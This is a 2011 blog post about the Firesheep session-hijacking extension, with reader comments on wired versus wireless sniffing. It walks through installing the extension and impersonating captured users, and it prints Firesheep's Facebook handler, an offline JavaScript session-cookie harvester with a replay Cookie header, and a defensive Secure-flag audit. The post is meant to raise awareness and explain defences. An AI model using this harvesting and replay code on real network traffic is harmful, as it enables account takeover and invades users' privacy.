A Firesheep Overview

Tuesday, January 11, 2011

Antonio Ierano


There has been a lot of talk around the FireSheep Firefox extension lately. So I wondered: what the hell is this add-on about?

I could have read all the available articles, or just done the most insecure and stupid thing: try it directly... and you can guess what I did.

Let’s start with an install of FireSheep.

To install something you usually need to have it, so first I tried to search for the FireSheep add-on (Google search).


Not an easy search, since a lot of links showed up, most of them just articles, but in the end I found the right site.

http://codebutler.github.com/firesheep/

I downloaded an XPI file that I opened with Firefox in order to load the extension.


Once the extension is loaded, go to "Options" and configure the interface you want to sniff and the websites you want to monitor.

Now most of the work is done, and the extension is available in Firefox as a sidebar.

image

Once activated, it appears on your left. To start the capture, just click on "Start Capturing".

All the configuration parameters can be found at the bottom left of the sidebar. You can also add handler scripts to cover more sites. Once you stop the capture, the identities found are listed in the left tab.

Those are the accounts/identities that were logged into monitored sites while you were sniffing. You just have to click on one and FireSheep opens the site with that user's session cookies, so you are logged in as them. It's as simple as that.

So, any questions? I have a couple (with answers too).

What exactly will FireSheep do?

Well, it simply sniffs the traffic and provides a point-and-click interface on top of it. You can get the same result with Wireshark, for example, but there you have to trace the connection by hand and pick the session cookie for the site out of the HTTP headers. Everything is in the capture either way; FireSheep just makes it easy.

FireSheep monitors an unsecured network, such as you'd find in just about any public Wi-Fi hotspot, and watches for the session cookies that browsers send in clear-text HTTP requests to websites.

FireSheep collects the values of those cookies, which is enough to access the website as exactly the same session: the password is never captured, but it is not needed, because the site trusts whoever presents the cookie. In very simple terms, you can very quickly and easily access the most popular social networking websites as someone else; you basically take over complete access to their account, for as long as that session stays valid.

The scariest thing about this add-on is that it is terribly simple to install and use, but it has limitations and it is not a complete hacking suite (luckily).

On Windows (from Windows XP up to the newest Windows 7) it needs WinPcap 4.1.2 to work, and it works only with the current release of Firefox, so the Firefox 4 beta will not do.

At the same time it is not yet available for Linux, so this add-on is only usable on Mac and Windows. And honestly, on Mac it is even easier to use.

Why does it need a wireless connection?

You might assume that FireSheep works on wireless LANs because they are less secure, but the reason is simpler than that, and strictly speaking it does not need wireless at all: it needs a network where your interface can receive other hosts' frames. Without encryption, a wireless LAN behaves like an old hub: the radio is one shared medium, so a card in monitor or promiscuous mode sees every station's traffic. (WPA/WPA2 with a pre-shared key only partly helps: anyone who knows the key and captures a client's association handshake can decrypt that client's traffic as well.)

On a typical wired network you are connected to your own switch port, so your interface, even without any encryption, sees only its own traffic plus broadcast and multicast, which is of no use for FireSheep's purposes. To sniff a switched LAN an attacker has to take an extra step, such as ARP spoofing, to pull other hosts' traffic through his port, so the wired case is harder but not impossible.

How can I protect myself?

Well, once we understand how this works, we can do a couple of things. FireSheep sniffs HTTP traffic on the local segment, so any redirection technique, such as a proxy agent or a PAC file that sends the browser through a proxy, is useless on its own unless you can force encryption between the device and the proxy.

The problem is that even if you don't go directly to the website but pass through a proxy, the hop from your device to the proxy is still plain HTTP. FireSheep looks for HTTP requests and the cookies they carry, so it does not care whether an intermediate security host (proxy or whatever) is in the path or not.

At the same time the intermediate security host cannot detect the attack, since nothing in the user's traffic is changed: it is simply copied off the wire, so there is no anomaly for a proxy or IDS to notice.

In terms of products, to be clear, you would be protected using something like the ScanSafe Anywhere+ agent (because it encrypts all the traffic from the device to the ScanSafe cloud server), or AnyConnect with its SSL tunnel and WSA integration.

You would not be protected by a non-encrypting agent like the WebRoot One, or by a browser proxy configuration as used with Zscaler, McAfee or Websense, because the browser would still send plain HTTP that FireSheep can sniff on the local network. Better still is end-to-end encryption: when the site itself serves every page over HTTPS, the cookie never travels in clear text, whatever network or proxy you are on.
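To make the protection argument concrete, here is an added example (it is not code from this post or from any of the products named above) that models which cookies a browser puts on the wire in clear text, which is all FireSheep needs. The site name example.test, the cookie values and the Set-Cookie headers are constructed for the example; Secure and HttpOnly are the standard cookie attributes and are handled the way a browser handles them.

```javascript
// Added example, not code from the post or from any product named on the page:
// which of a site's cookies does a browser put on the wire in clear text?
// That is the only thing Firesheep needs. The site name example.test, the
// cookie values and the Set-Cookie headers below are constructed for the example.

// Parse one Set-Cookie response header into name, value and the two
// attributes that matter here (Secure, HttpOnly).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), secure: false, httpOnly: false };
  for (const attr of attrs) {
    const key = attr.split('=')[0].trim().toLowerCase();
    if (key === 'secure') cookie.secure = true;
    else if (key === 'httponly') cookie.httpOnly = true;
  }
  return cookie;
}

// Cookies a browser attaches to a request with the given scheme. A Secure
// cookie is sent only over https://, so it never appears in a clear-text
// request, proxy or no proxy in the path.
function cookiesSentOver(scheme, jar) {
  return jar.filter(c => scheme === 'https' || !c.secure);
}

// Audit: names of the session cookies a Firesheep-style sniffer could pick up
// from any http:// request to the site.
function sniffableSessionCookies(setCookieHeaders, sessionCookieNames) {
  const jar = setCookieHeaders.map(parseSetCookie);
  return cookiesSentOver('http', jar)
    .filter(c => sessionCookieNames.includes(c.name))
    .map(c => c.name);
}

// Constructed headers for the same site before and after the fix: the session
// cookies marked Secure so they only ever travel inside TLS.
const BEFORE = [
  'c_user=100001; Path=/; Domain=.example.test',
  'xs=7%3Aexamplexs; Path=/; Domain=.example.test; HttpOnly', // HttpOnly stops scripts, not sniffers
  'theme=dark; Path=/',
];
const AFTER = [
  'c_user=100001; Path=/; Domain=.example.test; Secure',
  'xs=7%3Aexamplexs; Path=/; Domain=.example.test; Secure; HttpOnly',
  'theme=dark; Path=/',
];
const SESSION_NAMES = ['c_user', 'xs'];

console.log('before:', sniffableSessionCookies(BEFORE, SESSION_NAMES)); // [ 'c_user', 'xs' ]
console.log('after: ', sniffableSessionCookies(AFTER, SESSION_NAMES));  // []
```

The proxy question disappears in this model: with or without a security host in the path, a cookie without Secure rides on any http:// request and is visible to everyone on the segment, while a Secure cookie is only ever sent inside TLS. Secure on its own logs the user out of any page still served over plain HTTP, which is why the complete fix is serving the whole site over HTTPS; the flag is what guarantees that a stray http:// link leaks nothing.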

Is using FireSheep breaking the law?

Writing the code or installing the add-on is legal; how you use it and what you do with it could, on the other hand, be a crime. Remember that stealing another user's credentials violates their privacy, and this can lead to legal consequences in several countries.

Just for fun, this is the handler script FireSheep ships for Facebook. The main parameters are the domain, the URL used to fetch the user's page, and the cookie names to look for while sniffing:

// Authors:
//   Eric Butler
// Firesheep site handler: register() tells the sniffer which hosts to watch,
// which cookie names make up a session, and how to turn a captured session
// into the name and picture shown in the sidebar.
register({
  name: 'Facebook',
  url: 'http://www.facebook.com/home.php',        // page fetched with the captured cookies
  domains: [ 'facebook.com' ],                    // only requests to these hosts are inspected
  sessionCookieNames: [ 'xs', 'c_user', 'sid' ],  // cookies that identify a logged-in session

  // Runs once a session is captured: replays a request with the captured
  // cookies and scrapes the victim's display name and avatar from the page.
  identifyUser: function () {
    var resp = this.httpGet(this.siteUrl);
    this.userName   = resp.body.querySelector('#navAccountName').innerHTML;
    this.userAvatar = resp.body.querySelector('#navAccountPic img').src;
  }
});

Basically you can find the information you need to feed to FireSheep (or to do the same thing with tcpdump or Wireshark) just by monitoring your own traffic.

OK, I admit that in Wireshark the job can be a little tedious.

Using HttpWatch, for example, you can find the cookies involved directly by clicking on the Cookies tab.
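As an added example (mine, not Firesheep's code), here is the same idea written out: a handler table in the shape of Firesheep's register() calls, a parser for clear-text HTTP requests, and the loop that turns captured requests into the list of identities the sidebar shows, plus the Cookie header that "clicking on an identity" amounts to. The capture is constructed inline, the forum.example handler and all cookie values are made up, and requiring every listed cookie to be present is this example's rule, not a claim about Firesheep's exact matching logic.

```javascript
// Added example: a minimal Firesheep-style session harvester run over a
// constructed capture instead of a live interface. Not Firesheep's code.

// Handler table in the shape of Firesheep's register() calls. The Facebook
// entry uses the values from the handler shown on the page; forum.example and
// its PHPSESSID cookie are made up to show that the matching is generic.
const HANDLERS = [
  { name: 'Facebook', domains: ['facebook.com'], sessionCookieNames: ['xs', 'c_user', 'sid'] },
  { name: 'ExampleForum', domains: ['forum.example'], sessionCookieNames: ['PHPSESSID'] },
];

// Parse one clear-text HTTP request (what a sniffer sees on port 80) into its
// request line and a lower-cased header map. Anything that is not HTTP, such
// as a TLS record (first byte 0x16), has no readable headers and yields null.
function parseHttpRequest(bytes) {
  if (!/^(GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP\/1\.[01]\r\n/.test(bytes)) return null;
  const lines = bytes.split('\r\n\r\n')[0].split('\r\n');
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(':');
    if (idx < 0) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { requestLine: lines[0], headers };
}

// Split a Cookie request header ("a=1; b=2") into a name -> value map.
function parseCookieHeader(value) {
  const jar = {};
  for (const part of value.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    jar[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return jar;
}

// Find the handler whose domain list covers this Host header (port stripped).
function handlerFor(host) {
  const h = host.toLowerCase().replace(/:\d+$/, '');
  return HANDLERS.find(x => x.domains.some(d => h === d || h.endsWith('.' + d)));
}

// The core loop: for each captured request, look up a handler for the Host
// and, if every session cookie the handler lists is present, record a session.
// Keyed on site plus cookie values so repeated requests collapse to one entry.
function harvestSessions(capturedRequests) {
  const sessions = new Map();
  for (const bytes of capturedRequests) {
    const req = parseHttpRequest(bytes);
    if (!req || !req.headers.host || !req.headers.cookie) continue;
    const handler = handlerFor(req.headers.host);
    if (!handler) continue;
    const jar = parseCookieHeader(req.headers.cookie);
    if (!handler.sessionCookieNames.every(n => n in jar)) continue;
    const cookies = Object.fromEntries(handler.sessionCookieNames.map(n => [n, jar[n]]));
    const key = handler.name + '|' + Object.values(cookies).join('|');
    sessions.set(key, { site: handler.name, host: req.headers.host, cookies });
  }
  return [...sessions.values()];
}

// What "clicking on an identity" comes down to: the Cookie header to attach to
// a request for the handler's URL so the site treats us as that user.
function replayCookieHeader(session) {
  return Object.entries(session.cookies).map(([k, v]) => `${k}=${v}`).join('; ');
}

// Constructed capture: five payloads as they might appear on an open Wi-Fi.
const SAMPLE_CAPTURE = [
  'GET /home.php HTTP/1.1\r\nHost: www.facebook.com\r\nCookie: datr=abc; c_user=100001; xs=7%3Aexamplexs; sid=3\r\n\r\n',
  'GET /index.php HTTP/1.1\r\nHost: forum.example\r\nCookie: PHPSESSID=deadbeefcafe; theme=dark\r\n\r\n',
  'GET /photos HTTP/1.1\r\nHost: www.facebook.com\r\nCookie: datr=abc; c_user=100001; xs=7%3Aexamplexs; sid=3\r\n\r\n',
  'GET / HTTP/1.1\r\nHost: www.facebook.com\r\nCookie: datr=xyz\r\n\r\n', // not logged in: no session cookies
  '\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03',                          // start of a TLS ClientHello: nothing to read
];

for (const s of harvestSessions(SAMPLE_CAPTURE)) {
  console.log(`${s.site} via ${s.host} -> Cookie: ${replayCookieHeader(s)}`);
}
// prints two lines, the Facebook session and the forum session; the two
// Facebook requests collapse into one entry, and the logged-out request and
// the TLS bytes contribute nothing
```

Run with node; the whole thing is offline. The interesting part for a defender is what is absent from the output: the request without session cookies and the TLS bytes, which is exactly the difference between a site that leaks its session over plain HTTP and one that does not.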

So there is nothing really new under the sun with FireSheep, just a very easy interface that exposes something we all should already know (at least those of us who work in this arena).

Do we really need something like FireSheep to realize how easy sniffing credentials can be? If so, we should welcome FireSheep for providing us with a little more awareness.

Cross-posted from Portadiferro

Comments:
Stefan Fouant Excellent article Antonio, but I just wanted to point out that the idea that Firesheep only works on wireless networks is false. This can be exploited on both wireless and wired networks, and can in fact also be exploited on wireless networks that implement encryption. I covered this in my articles on "The Misconceptions of Sidejacking with Firesheep" - https://www.infosecisland.com/blogview/10209-The-Misconceptions-of-Sidejacking-with-Firesheep.html and also my article on "Man in the Middle (MITM) Attacks Explained" - https://www.infosecisland.com/blogview/10475-Man-in-the-Middle-MITM-Attacks-Explained.html
[2011-01-12 20:22 UTC]
Ben Keeley It may be possible with wired, yes, but with all due respect, in an enterprise environment it's very unlikely. Most enterprise switches offer ARP spoofing protection...
http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.1E/native/configuration/guide/port_sec.html

And then there is the IDS/IPS.... which should also detect arp spoofing.
[2011-01-13 16:12 UTC]
Antonio Ierano Stefan

you are absolutely right, Firesheep can be used in different environments, but as you mentioned, it requires anyway a little bit more geek work.

I think the point is not the sidejacking technology but the easy implementation of the tool that stirred up all those rumors.

The idea was to provide a proof of how easy it would be for a "non-geek" user to make this relatively simple hack on unprotected networks (and so, for example, showing how a quite easy piece of malware could have done the same).

If the idea was to point out that open wireless networks are, as a matter of fact, high-risk areas in terms of privacy and data protection :) I think Firesheep did a good job.

As I wrote, there was nothing new, and the same "joke" could have been "easily" done with a simple sniffer.

ARP spoofing, sidejacking and MITM are way too complex subjects to be explained to the vast majority of internet users (and many journalists and security experts as well, he he he he).

PS I've read your articles and they are very good :)
[2011-01-13 16:30 UTC]
Stefan Fouant Ben, I agree that those are certainly options, and I covered in my article on MITM attack mitigation mechanisms. However, to say that it is unlikely to be exploited on Enterprise networks is not at all realistic and in fact is a dangerous claim because it will lead enterprise users into a false sense of security.

First of all, how many enterprise environments utilize an IDS/IPS on their user LAN segments? In my experience it is almost nil. After years and years of talking about the perimeter model being dead, most enterprises still utilize their IDS/IPS systems as a perimeter technology, looking for suspicious signatures entering their environment or data being exfiltrated.

With regards to ARP spoofing protections, there are caveats and ways to circumvent these protections. And for the record, Port Security does not prevent ARP spoofing, but rather other mechanisms are used to prevent it like ARP inspection coupled with DHCP binding tables, etc. Once again, in my experience, I rarely see enterprises deploying such mechanisms because they are either poorly implemented or not well understood.

The bottom line is that these types of vulnerabilities exist whether we are talking about Wireless or Wired networks. To say that there are protections in the network layer equipment that make it unlikely is not a good enough answer - it causes users to be careless and not be responsible for their security. The answer to these problems can only be solved with true end-to-end encryption and anything less is tantamount to failure.
[2011-01-13 16:39 UTC]
Ben Keeley Guess it depends on the enterprise network :)

I have personally seen individuals caught ARP spoofing within an office space environment, with the relevant outcomes you'd expect. And I know several company networks that have IPS/IDS between user segments (let alone backend).

The point is in an enterprise wired network, users do not decide the security posture of their machines, the business does (with our input) and there are bigger threats than the use of firesheep IMHO.
[2011-01-13 16:50 UTC]